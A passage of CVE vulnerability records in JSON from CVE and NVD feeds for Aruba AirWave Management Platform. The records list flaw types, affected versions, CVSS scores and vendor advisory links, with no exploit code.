          "value": "A remote unauthorized access vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote unauthorized access",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-04-29T10:52:15",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-25166",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote unauthorized access vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote unauthorized access"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-25166",
    "datePublished": "2021-04-29T10:52:15",
    "dateReserved": "2021-01-14T00:00:00",
    "dateUpdated": "2024-08-03T19:56:10.643Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-4896
Vulnerability from cvelistv5
Published
2023-10-17 19:01
Modified
2024-09-13 19:34
Summary
A vulnerability exists which allows an authenticated attacker to access sensitive information on the AirWave Management Platform web-based management interface. Successful exploitation allows the attacker to gain access to some data that could be further exploited to laterally access devices managed and monitored by the AirWave server.
Impacted products
Vendor Product Version
HewarHewlett Packard Enterprise (HPE) Aruba AirWave Management Platform Version: 8.3.0.1 and below
Version: 8.2.15.2 and below
Create a notification for this product.
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:38:00.896Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-015.txt"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-4896",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-13T19:34:28.291450Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-13T19:34:42.309Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Aruba AirWave Management Platform",
          "vendor": "HewarHewlett Packard Enterprise (HPE)",
          "versions": [
            {
              "status": "affected",
              "version": "8.3.0.1 and below "
            },
            {
              "status": "affected",
              "version": "8.2.15.2 and below"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "reporter",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "1njected (bugcrowd.com/1njected)"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "A vulnerability exists which allows an authenticated attacker to access sensitive information on the AirWave Management Platform web-based management interface. Successful exploitation allows the attacker to gain access to some data that could be further exploited to laterally access devices managed and monitored by the AirWave server."
            }
          ],
          "value": "A vulnerability exists which allows an authenticated attacker to access sensitive information on the AirWave Management Platform web-based management interface. Successful exploitation allows the attacker to gain access to some data that could be further exploited to laterally access devices managed and monitored by the AirWave server."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-10-17T19:01:14.125Z",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-015.txt"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Authenticated Disclosure of Sensitive Information in AirWave Management Platform",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2023-4896",
    "datePublished": "2023-10-17T19:01:14.125Z",
    "dateReserved": "2023-09-11T18:13:53.341Z",
    "dateUpdated": "2024-09-13T19:34:42.309Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

Vulnerability from fkie_nvd
Published
2022-12-08 16:15
Modified
2024-11-21 07:15
Summary
Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1919829E-4325-4155-9171-FE9F3AA987B4",
              "versionEndIncluding": "8.2.15.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.\n\n"
    },
    {
      "lang": "es",
      "value": "Existen vulnerabilidades en la interfaz de administraci\u00f3n basada en web de AirWave Management Platform que exponen algunas URL a una falta de controles de acceso adecuados. Estas vulnerabilidades podr\u00edan permitir que un atacante remoto con privilegios limitados obtenga acceso a informaci\u00f3n confidencial y/o cambie las configuraciones de red con privilegios en un nivel efectivo m\u00e1s alto en las versiones de la plataforma de administraci\u00f3n Aruba AirWave: 8.2.15.0 y anteriores."
    }
  ],
  "id": "CVE-2022-37918",
  "lastModified": "2024-11-21T07:15:22.867",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2022-12-08T16:15:11.550",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-019.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-019.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-03-05 17:15
Modified
2024-11-21 05:57
Summary
A remote authenticated authenticated xml external entity (xxe) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Due to improper restrictions on XML entities a vulnerability exists in the web-based management interface of AirWave. A successful exploit could allow an authenticated attacker to retrieve files from the local system or cause the application to consume system resources, resulting in a denial of service condition.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F6CD495-ED12-4332-8806-647134C1E15D",
              "versionEndExcluding": "8.2.12.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote authenticated authenticated xml external entity (xxe) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Due to improper restrictions on XML entities a vulnerability exists in the web-based management interface of AirWave. A successful exploit could allow an authenticated attacker to retrieve files from the local system or cause the application to consume system resources, resulting in a denial of service condition."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de xml external entity (xxe) autenticada remota en Aruba AirWave Management Platform versiones: anteriores a 8.2.12.0.\u0026#xa0;Debido a restricciones inapropiadas en entidades XML, se presenta una vulnerabilidad en la interfaz de administraci\u00f3n basada en web de AirWave.\u0026#xa0;Una explotaci\u00f3n con \u00e9xito podr\u00eda permitir a un atacante autenticado recuperar archivos del sistema local o causar a la aplicaci\u00f3n consumir recursos del sistema, resultando en una condici\u00f3n de denegaci\u00f3n de servicio"
    }
  ],
  "id": "CVE-2021-26969",
  "lastModified": "2024-11-21T05:57:08.537",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-03-05T17:15:14.750",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-611"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-03-05 17:15
Modified
2024-11-21 05:57
Summary
A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave CLI could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to full system compromise.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F6CD495-ED12-4332-8806-647134C1E15D",
              "versionEndExcluding": "8.2.12.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave CLI could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to full system compromise."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de ejecuci\u00f3n de comandos arbitraria autenticada remota en Aruba AirWave Management Platform versiones: anteriores a 8.2.12.0.\u0026#xa0;Unas vulnerabilidades en la CLI de AirWave podr\u00edan permitir a usuarios autenticados remoto ejecutar comandos arbitrarios en el host subyacente.\u0026#xa0;Una explotaci\u00f3n con \u00e9xito podr\u00eda permitir a un atacante ejecutar comandos arbitrarios como root en el sistema operativo subyacente, conllevando a un compromiso total del sistema"
    }
  ],
  "id": "CVE-2021-26963",
  "lastModified": "2024-11-21T05:57:07.897",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-03-05T17:15:14.407",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-03-05 17:15
Modified
2024-11-21 05:57
Summary
A remote authenticated sql injection vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Multiple vulnerabilities in the API of AirWave could allow an authenticated remote attacker to conduct SQL injection attacks against the AirWave instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F6CD495-ED12-4332-8806-647134C1E15D",
              "versionEndExcluding": "8.2.12.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote authenticated sql injection vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Multiple vulnerabilities in the API of AirWave could allow an authenticated remote attacker to conduct SQL injection attacks against the AirWave instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de inyecci\u00f3n SQL autenticada remota en Aruba AirWave Management Platform versiones: anteriores a 8.2.12.0.\u0026#xa0;M\u00faltiples vulnerabilidades en la API de AirWave podr\u00edan permitir a un atacante remoto autenticado conducir ataques de inyecci\u00f3n SQL contra la instancia de AirWave.\u0026#xa0;Un atacante podr\u00eda explotar estas vulnerabilidades para obtener y modificar informaci\u00f3n confidencial en la base de datos subyacente"
    }
  ],
  "id": "CVE-2021-26966",
  "lastModified": "2024-11-21T05:57:08.210",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "NONE",
          "baseScore": 5.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-03-05T17:15:14.593",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2022-12-08 16:15
Modified
2024-11-21 07:15
Summary
Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1919829E-4325-4155-9171-FE9F3AA987B4",
              "versionEndIncluding": "8.2.15.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.\n\n"
    },
    {
      "lang": "es",
      "value": "Existen vulnerabilidades en la interfaz de administraci\u00f3n basada en web de AirWave Management Platform que exponen algunas URL a una falta de controles de acceso adecuados. Estas vulnerabilidades podr\u00edan permitir que un atacante remoto con privilegios limitados obtenga acceso a informaci\u00f3n confidencial y/o cambie las configuraciones de red con privilegios en un nivel efectivo m\u00e1s alto en las versiones de la plataforma de administraci\u00f3n Aruba AirWave: 8.2.15.0 y anteriores."
    }
  ],
  "id": "CVE-2022-37916",
  "lastModified": "2024-11-21T07:15:22.633",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2022-12-08T16:15:11.397",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-019.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-019.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-03-05 17:15
Modified
2024-11-21 05:57
Summary
A remote authenticated stored cross-site scripting (xss) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the web-based management interface of AirWave could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F6CD495-ED12-4332-8806-647134C1E15D",
              "versionEndExcluding": "8.2.12.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote authenticated stored cross-site scripting (xss) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the web-based management interface of AirWave could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim\u2019s browser in the context of the affected interface."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad autenticada remota  de tipo cross-site scripting (xss) almacenado en Aruba AirWave Management Platform versiones: anteriores a 8.2.12.0.\u0026#xa0;Una vulnerabilidad en la interfaz de administraci\u00f3n basada en web de AirWave podr\u00eda permitir a un atacante remoto autenticado conducir un ataque de tipo cross-site scripting (XSS) almacenado contra un usuario de la interfaz.\u0026#xa0;Una explotaci\u00f3n con \u00e9xito podr\u00eda permitir a un atacante ejecutar c\u00f3digo script arbitrario en el navegador de la v\u00edctima en el contexto de la interfaz afectada"
    }
  ],
  "id": "CVE-2021-26968",
  "lastModified": "2024-11-21T05:57:08.423",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "LOW",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "NONE",
          "baseScore": 3.5,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.8,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.7,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-03-05T17:15:14.703",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-03-05 16:15
Modified
2024-11-21 05:57
Summary
A remote unauthenticated cross-site request forgery (csrf) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an unauthenticated remote attacker to conduct a CSRF attack against a vulnerable system. A successful exploit would consist of an attacker persuading an authorized user to follow a malicious link, resulting in arbitrary actions being carried out with the privilege level of the targeted user.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F6CD495-ED12-4332-8806-647134C1E15D",
              "versionEndExcluding": "8.2.12.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote unauthenticated cross-site request forgery (csrf) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an unauthenticated remote attacker to conduct a CSRF attack against a vulnerable system. A successful exploit would consist of an attacker persuading an authorized user to follow a malicious link, resulting in arbitrary actions being carried out with the privilege level of the targeted user."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de tipo cross-site request forgery (csrf) remotos no autenticados en Aruba AirWave Management Platform versiones: anteriores a 8.2.12.0.\u0026#xa0;Una vulnerabilidad en la interfaz de administraci\u00f3n basada en web de AirWave podr\u00eda permitir a un atacante remoto no autenticado conducir un ataque CSRF contra un sistema vulnerable.\u0026#xa0;Una explotaci\u00f3n con \u00e9xito consistir\u00eda en que un atacante persuadir\u00e1 a un usuario autorizado de seguir un enlace malicioso, resultando en acciones arbitrarias llevadas a cabo con el nivel de privilegio del usuario objetivo"
    }
  ],
  "id": "CVE-2021-26961",
  "lastModified": "2024-11-21T05:57:07.687",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
